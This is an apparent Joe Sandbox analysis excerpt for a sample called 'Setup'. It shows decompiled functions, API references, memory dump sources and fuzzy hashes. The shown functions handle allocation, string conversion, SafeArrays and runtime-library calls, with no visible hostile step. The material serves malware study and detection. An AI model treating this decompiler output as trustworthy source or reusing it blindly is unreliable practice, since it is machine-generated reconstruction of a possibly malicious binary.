                                                                                                                                                              • Opcode ID: a51f7e5378a0803056d5c623f8d65849aacbfa87ca64dff1ae1e2cf30a0d2efd
                                                                                                                                                              • Instruction ID: 05f35079934cdba28f038054f1e2dc774b529e5327ec5f593cc00cef1487bd56
                                                                                                                                                              • Opcode Fuzzy Hash: a51f7e5378a0803056d5c623f8d65849aacbfa87ca64dff1ae1e2cf30a0d2efd
                                                                                                                                                              • Instruction Fuzzy Hash: A8312FB1D001099FDB04DF99D852BEFBBB8EF48318F14051EE505A7381D7796A44CBA6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0042B890 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                              			E0042B890(void* __eflags) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				void* __ecx;
				signed int _t30;
				intOrPtr _t49;
				signed int _t72;
				void* _t73;

				_push(0xffffffff);
				_push(0x5136f0);
				_push( *[fs:0x0]);
				_push(_t49);
				_t30 =  *0x561244; // 0xddd124f9
				_push(_t30 ^ _t72);
				 *[fs:0x0] =  &_v16;
				_v20 = _t73 - 0x18;
				_v44 = _t49;
				_v28 = E0043FE80(_v44 + 1, 1);
				_v24 = 0;
				_v8 = 0;
				_v32 = 0;
				E0041EB00(_v44 + 2, E00415110(_v28),  &_v32);
				_v24 = _v24 + 1;
				_v36 = 0;
				E0041EB00(_v44 + 2, E0042AE30(_v28),  &_v36);
				_v24 = _v24 + 1;
				_v40 = 0;
				E0041EB00(_v44 + 2, E00441910(_v28),  &_v40);
				_v8 = 0xffffffff;
				 *((char*)(E0043B340(_v28))) = 1;
				 *((char*)(E0043F400(_v28))) = 0;
				 *[fs:0x0] = _v16;
				return _v28;
			}

















                                                                                                                                                              0x0042b893
                                                                                                                                                              0x0042b895
                                                                                                                                                              0x0042b8a0
                                                                                                                                                              0x0042b8a1
                                                                                                                                                              0x0042b8a8
                                                                                                                                                              0x0042b8af
                                                                                                                                                              0x0042b8b3
                                                                                                                                                              0x0042b8b9
                                                                                                                                                              0x0042b8bc
                                                                                                                                                              0x0042b8cc
                                                                                                                                                              0x0042b8cf
                                                                                                                                                              0x0042b8d6
                                                                                                                                                              0x0042b8dd
                                                                                                                                                              0x0042b8fb
                                                                                                                                                              0x0042b906
                                                                                                                                                              0x0042b909
                                                                                                                                                              0x0042b927
                                                                                                                                                              0x0042b932
                                                                                                                                                              0x0042b935
                                                                                                                                                              0x0042b953
                                                                                                                                                              0x0042b9bd
                                                                                                                                                              0x0042b9d0
                                                                                                                                                              0x0042b9df
                                                                                                                                                              0x0042b9e8
                                                                                                                                                              0x0042b9f6

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: allocator
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3447690668-0
                                                                                                                                                              • Opcode ID: 4aff5d9f21bdfb3d3d8716cc33128bf8b40626263074b56b5cd60e520f8664fe
                                                                                                                                                              • Instruction ID: 98fba1e50e0b72f528f9d1a32b70f180bbe653f548eedb9eba508b6e49ba1941
                                                                                                                                                              • Opcode Fuzzy Hash: 4aff5d9f21bdfb3d3d8716cc33128bf8b40626263074b56b5cd60e520f8664fe
                                                                                                                                                              • Instruction Fuzzy Hash: 82312FB1D001099FDB04DF99D852BEFBBB8EF48318F14051EE605A7342D7396944CBA6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00421A50 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                              			E00421A50(void* __eflags) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				void* __ecx;
				signed int _t30;
				intOrPtr _t49;
				signed int _t72;
				void* _t73;

				_push(0xffffffff);
				_push(0x5137a0);
				_push( *[fs:0x0]);
				_push(_t49);
				_t30 =  *0x561244; // 0xddd124f9
				_push(_t30 ^ _t72);
				 *[fs:0x0] =  &_v16;
				_v20 = _t73 - 0x18;
				_v44 = _t49;
				_v28 = E00421BC0(_v44 + 1, 1);
				_v24 = 0;
				_v8 = 0;
				_v32 = 0;
				E0041EB00(_v44 + 2, E00415110(_v28),  &_v32);
				_v24 = _v24 + 1;
				_v36 = 0;
				E0041EB00(_v44 + 2, E0042AE30(_v28),  &_v36);
				_v24 = _v24 + 1;
				_v40 = 0;
				E0041EB00(_v44 + 2, E00441910(_v28),  &_v40);
				_v8 = 0xffffffff;
				 *((char*)(E00420150(_v28))) = 1;
				 *((char*)(E00420160(_v28))) = 0;
				 *[fs:0x0] = _v16;
				return _v28;
			}

















                                                                                                                                                              0x00421a53
                                                                                                                                                              0x00421a55
                                                                                                                                                              0x00421a60
                                                                                                                                                              0x00421a61
                                                                                                                                                              0x00421a68
                                                                                                                                                              0x00421a6f
                                                                                                                                                              0x00421a73
                                                                                                                                                              0x00421a79
                                                                                                                                                              0x00421a7c
                                                                                                                                                              0x00421a8c
                                                                                                                                                              0x00421a8f
                                                                                                                                                              0x00421a96
                                                                                                                                                              0x00421a9d
                                                                                                                                                              0x00421abb
                                                                                                                                                              0x00421ac6
                                                                                                                                                              0x00421ac9
                                                                                                                                                              0x00421ae7
                                                                                                                                                              0x00421af2
                                                                                                                                                              0x00421af5
                                                                                                                                                              0x00421b13
                                                                                                                                                              0x00421b7d
                                                                                                                                                              0x00421b90
                                                                                                                                                              0x00421b9f
                                                                                                                                                              0x00421ba8
                                                                                                                                                              0x00421bb6

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: allocator
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3447690668-0
                                                                                                                                                              • Opcode ID: cac359c06f5b99315221439c5d973be7cbf478c8bda0a670c3a99057d80456fc
                                                                                                                                                              • Instruction ID: ec76bf2b0cc585e738b8d3f54cdf3feb26d35ed437d4d6351af21d77caeb081f
                                                                                                                                                              • Opcode Fuzzy Hash: cac359c06f5b99315221439c5d973be7cbf478c8bda0a670c3a99057d80456fc
                                                                                                                                                              • Instruction Fuzzy Hash: 1B314DB1D001099FDB04DF99D852BEFBBB8EF48318F14051EE505A7382D73A6A44CBA6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00419D50 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 54%
                                                                                                                                                              			E00419D50(char* _a4, int _a8) {
				int _v8;
				char _v16;
				short* _v28;
				int _v32;
				char _v40;
				int _v44;
				short* _v48;
				int _v52;
				int _v56;
				short* _v60;
				signed int _t40;
				int _t43;
				short* _t48;
				signed int _t70;

				_push(0xffffffff);
				_push(0x513dc8);
				_push( *[fs:0x0]);
				_t40 =  *0x561244; // 0xddd124f9
				_push(_t40 ^ _t70);
				 *[fs:0x0] =  &_v16;
				if(_a4 == 0 || _a8 == 0) {
					_t43 = 0;
				} else {
					_v32 = E00417320();
					E00413100( &_v40);
					_v8 = 0;
					_v48 = 0;
					_v44 = MultiByteToWideChar(_v32, 0, _a4, _a8, 0, 0);
					_t48 = _v44;
					_v28 = _t48;
					if(_a8 == 0xffffffff) {
						_v28 = _v28 - 1;
					}
					__imp__#4(0, _v28);
					_v48 = _t48;
					if(_v48 == 0) {
						L8:
						_v60 = _v48;
						_v8 = 0xffffffff;
						E00417350( &_v40);
						_t43 = _v60;
					} else {
						_v52 = MultiByteToWideChar(_v32, 0, _a4, _a8, _v48, _v44);
						if(_v52 == _v44) {
							goto L8;
						} else {
							__imp__#6(_v48);
							_v56 = 0;
							_v8 = 0xffffffff;
							E00417350( &_v40);
							_t43 = _v56;
						}
					}
				}
				 *[fs:0x0] = _v16;
				return _t43;
			}

















                                                                                                                                                              0x00419d53
                                                                                                                                                              0x00419d55
                                                                                                                                                              0x00419d60
                                                                                                                                                              0x00419d64
                                                                                                                                                              0x00419d6b
                                                                                                                                                              0x00419d6f
                                                                                                                                                              0x00419d79
                                                                                                                                                              0x00419d81
                                                                                                                                                              0x00419d88
                                                                                                                                                              0x00419d8d
                                                                                                                                                              0x00419d93
                                                                                                                                                              0x00419d98
                                                                                                                                                              0x00419d9f
                                                                                                                                                              0x00419dbe
                                                                                                                                                              0x00419dc1
                                                                                                                                                              0x00419dc4
                                                                                                                                                              0x00419dcb
                                                                                                                                                              0x00419dd3
                                                                                                                                                              0x00419dd3
                                                                                                                                                              0x00419ddc
                                                                                                                                                              0x00419de2
                                                                                                                                                              0x00419de9
                                                                                                                                                              0x00419e37
                                                                                                                                                              0x00419e3a
                                                                                                                                                              0x00419e3d
                                                                                                                                                              0x00419e47
                                                                                                                                                              0x00419e4c
                                                                                                                                                              0x00419deb
                                                                                                                                                              0x00419e07
                                                                                                                                                              0x00419e10
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00419e12
                                                                                                                                                              0x00419e16
                                                                                                                                                              0x00419e1c
                                                                                                                                                              0x00419e23
                                                                                                                                                              0x00419e2d
                                                                                                                                                              0x00419e32
                                                                                                                                                              0x00419e32
                                                                                                                                                              0x00419e10
                                                                                                                                                              0x00419de9
                                                                                                                                                              0x00419e52
                                                                                                                                                              0x00419e5d

                                                                                                                                                              APIs
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,DDD124F9), ref: 00419DB8
                                                                                                                                                              • SysAllocStringLen.OLEAUT32(00000000,000000FF), ref: 00419DDC
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF), ref: 00419E01
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00419E16
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiStringWide$AllocFree
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 447844807-0
                                                                                                                                                              • Opcode ID: c8b932e8dd3b0843b89be5497f9439bbe8ea484dff45ff3cb6e23b36c1336f1f
                                                                                                                                                              • Instruction ID: 5e98daa09e5da11dd0cbceeb89d3eba70e89bc9115de2a4c1e012f7c7e63a4c1
                                                                                                                                                              • Opcode Fuzzy Hash: c8b932e8dd3b0843b89be5497f9439bbe8ea484dff45ff3cb6e23b36c1336f1f
                                                                                                                                                              • Instruction Fuzzy Hash: 7B31E971D00208EFDB04DFA9D995BEEBBB4EB48720F108619F925A7280D7356A85CF94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00408F50 Relevance: 6.1, APIs: 4, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                              			E00408F50(void* __eflags) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				void* __ecx;
				signed int _t30;
				intOrPtr _t49;
				signed int _t72;
				void* _t73;

				_push(0xffffffff);
				_push(0x513a90);
				_push( *[fs:0x0]);
				_push(_t49);
				_t30 =  *0x561244; // 0xddd124f9
				_push(_t30 ^ _t72);
				 *[fs:0x0] =  &_v16;
				_v20 = _t73 - 0x18;
				_v44 = _t49;
				_v28 = E00409480(_v44 + 1, 1);
				_v24 = 0;
				_v8 = 0;
				_v32 = 0;
				E0041EB00(_v44 + 2, E00415110(_v28),  &_v32);
				_v24 = _v24 + 1;
				_v36 = 0;
				E0041EB00(_v44 + 2, E0042AE30(_v28),  &_v36);
				_v24 = _v24 + 1;
				_v40 = 0;
				E0041EB00(_v44 + 2, E00441910(_v28),  &_v40);
				_v8 = 0xffffffff;
				 *((char*)(E00409110(_v28))) = 1;
				 *((char*)(E00408710(_v28))) = 0;
				 *[fs:0x0] = _v16;
				return _v28;
			}

















                                                                                                                                                              0x00408f53
                                                                                                                                                              0x00408f55
                                                                                                                                                              0x00408f60
                                                                                                                                                              0x00408f61
                                                                                                                                                              0x00408f68
                                                                                                                                                              0x00408f6f
                                                                                                                                                              0x00408f73
                                                                                                                                                              0x00408f79
                                                                                                                                                              0x00408f7c
                                                                                                                                                              0x00408f8c
                                                                                                                                                              0x00408f8f
                                                                                                                                                              0x00408f96
                                                                                                                                                              0x00408f9d
                                                                                                                                                              0x00408fbb
                                                                                                                                                              0x00408fc6
                                                                                                                                                              0x00408fc9
                                                                                                                                                              0x00408fe7
                                                                                                                                                              0x00408ff2
                                                                                                                                                              0x00408ff5
                                                                                                                                                              0x00409013
                                                                                                                                                              0x0040907d
                                                                                                                                                              0x00409090
                                                                                                                                                              0x0040909f
                                                                                                                                                              0x004090a8
                                                                                                                                                              0x004090b6

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: allocator
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3447690668-0
                                                                                                                                                              • Opcode ID: 183301c742978be363bb8f1ab9b5ad5b5f802a6ff89599c1fb827626f1d6cb57
                                                                                                                                                              • Instruction ID: d27aea2102528378556eafdc0d2e7e9f5c29ea9e3cc09582983b0eac876c7694
                                                                                                                                                              • Opcode Fuzzy Hash: 183301c742978be363bb8f1ab9b5ad5b5f802a6ff89599c1fb827626f1d6cb57
                                                                                                                                                              • Instruction Fuzzy Hash: 22310BB1D001099BDB04DF99D852BEFBBB8EF48318F14052EE505B7282D7396A44CBA6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00422B60 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                              			E00422B60(void* __eflags, char _a4, char _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* __ecx;
				signed int _t25;
				intOrPtr _t41;
				signed int _t62;
				void* _t63;

				_push(0xffffffff);
				_push(0x5182e0);
				_push( *[fs:0x0]);
				_push(_t41);
				_t25 =  *0x561244; // 0xddd124f9
				_push(_t25 ^ _t62);
				 *[fs:0x0] =  &_v16;
				_v20 = _t63 - 0xc;
				_v32 = _t41;
				_v28 = E00422D30(_v32, 1);
				_v24 = 0;
				_v8 = 0;
				E0041EB00(_v32 + 1, E00415110(_v28),  &_a4);
				_v24 = _v24 + 1;
				E0041EB00(_v32 + 1, E0042AE30(_v28),  &_a8);
				_v24 = _v24 + 1;
				E00422D70(_v32 + 2, E00441910(_v28), _a12);
				_v8 = 0xffffffff;
				 *[fs:0x0] = _v16;
				return _v28;
			}














                                                                                                                                                              0x00422b63
                                                                                                                                                              0x00422b65
                                                                                                                                                              0x00422b70
                                                                                                                                                              0x00422b71
                                                                                                                                                              0x00422b78
                                                                                                                                                              0x00422b7f
                                                                                                                                                              0x00422b83
                                                                                                                                                              0x00422b89
                                                                                                                                                              0x00422b8c
                                                                                                                                                              0x00422b99
                                                                                                                                                              0x00422b9c
                                                                                                                                                              0x00422ba3
                                                                                                                                                              0x00422bc1
                                                                                                                                                              0x00422bcc
                                                                                                                                                              0x00422be6
                                                                                                                                                              0x00422bf1
                                                                                                                                                              0x00422c0b
                                                                                                                                                              0x00422c72
                                                                                                                                                              0x00422c7f
                                                                                                                                                              0x00422c8d

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: allocator
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3447690668-0
                                                                                                                                                              • Opcode ID: b6545de2f7bb57edffc094cb94e14e572292e9e9844fe40a7b740aeed0028dc7
                                                                                                                                                              • Instruction ID: a4b0708774b16f10b9a70ec2a5b46f27dd21e2dd8c1498d4e535dd292540d1e2
                                                                                                                                                              • Opcode Fuzzy Hash: b6545de2f7bb57edffc094cb94e14e572292e9e9844fe40a7b740aeed0028dc7
                                                                                                                                                              • Instruction Fuzzy Hash: 94216DB1E00109AFCB04DF99D852BEFB7B8FB44318F10462EE515A7381D6396A05CBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00496850 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SafeArrayDestroy.OLEAUT32 ref: 00496867
                                                                                                                                                              • SafeArrayCreate.OLEAUT32(00000000,00000001,00000000), ref: 004968A6
                                                                                                                                                              • SafeArrayLock.OLEAUT32(00000000), ref: 004968CB
                                                                                                                                                              • SafeArrayUnlock.OLEAUT32(00000000), ref: 004968FF
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ArraySafe$CreateDestroyLockUnlock
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2416500753-0
                                                                                                                                                              • Opcode ID: 777d77ee4ad11ff50700f991434bcc46e04ff0b75a31c979a6979b00de7a2f9e
                                                                                                                                                              • Instruction ID: 92761eab0e97011eb67d24bdfacb91ac975fb1fd29a295b39c674a0cf9b6101b
                                                                                                                                                              • Opcode Fuzzy Hash: 777d77ee4ad11ff50700f991434bcc46e04ff0b75a31c979a6979b00de7a2f9e
                                                                                                                                                              • Instruction Fuzzy Hash: 3C31A0B8A00208EFDB04DF94C484B9EFBB5FB49304F10C5AAE8259B344C739AA85CB54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0045B06B Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                              			E0045B06B(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x544598);
				E00456860(__ebx, __edi, __esi);
				_t28 = E00457400(__ebx, __edx, __edi, _t30);
				_t13 =  *0x56195c; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E00457DFC(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x561a40; // 0x561968
					 *((intOrPtr*)(_t29 - 0x1c)) = E0045B02D(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E0045B0D5();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00457400(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E00457948(_t25, _t26, 0x20);
				}
				return E004568A5(_t28);
			}







                                                                                                                                                              0x0045b06b
                                                                                                                                                              0x0045b06b
                                                                                                                                                              0x0045b06b
                                                                                                                                                              0x0045b06b
                                                                                                                                                              0x0045b06b
                                                                                                                                                              0x0045b06d
                                                                                                                                                              0x0045b072
                                                                                                                                                              0x0045b07c
                                                                                                                                                              0x0045b07e
                                                                                                                                                              0x0045b086
                                                                                                                                                              0x0045b0aa
                                                                                                                                                              0x0045b0ac
                                                                                                                                                              0x0045b0b2
                                                                                                                                                              0x0045b0b6
                                                                                                                                                              0x0045b0b9
                                                                                                                                                              0x0045b0c4
                                                                                                                                                              0x0045b0c7
                                                                                                                                                              0x0045b0ce
                                                                                                                                                              0x0045b088
                                                                                                                                                              0x0045b088
                                                                                                                                                              0x0045b08c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0045b08e
                                                                                                                                                              0x0045b093
                                                                                                                                                              0x0045b093
                                                                                                                                                              0x0045b08c
                                                                                                                                                              0x0045b098
                                                                                                                                                              0x0045b09c
                                                                                                                                                              0x0045b0a1
                                                                                                                                                              0x0045b0a9

                                                                                                                                                              APIs
                                                                                                                                                              • __getptd.LIBCMT ref: 0045B077
                                                                                                                                                                • Part of subcall function 00457400: __getptd_noexit.LIBCMT ref: 00457403
                                                                                                                                                                • Part of subcall function 00457400: __amsg_exit.LIBCMT ref: 00457410
                                                                                                                                                              • __getptd.LIBCMT ref: 0045B08E
                                                                                                                                                              • __amsg_exit.LIBCMT ref: 0045B09C
                                                                                                                                                              • __lock.LIBCMT ref: 0045B0AC
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3521780317-0
                                                                                                                                                              • Opcode ID: 900689175a814712c8bda9ebad6ca019b4626c4ef11eaf7f3bb20ddfba0632f0
                                                                                                                                                              • Instruction ID: cf4d89301f3c682c8d0dc1743faf2835190ae46168d4196da046f649daa6c5b0
                                                                                                                                                              • Opcode Fuzzy Hash: 900689175a814712c8bda9ebad6ca019b4626c4ef11eaf7f3bb20ddfba0632f0
                                                                                                                                                              • Instruction Fuzzy Hash: 85F06D319416048BD721BB6AD4027AF73A0AF00B2AF51451FEC609B2D3CB7C980D9A9A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

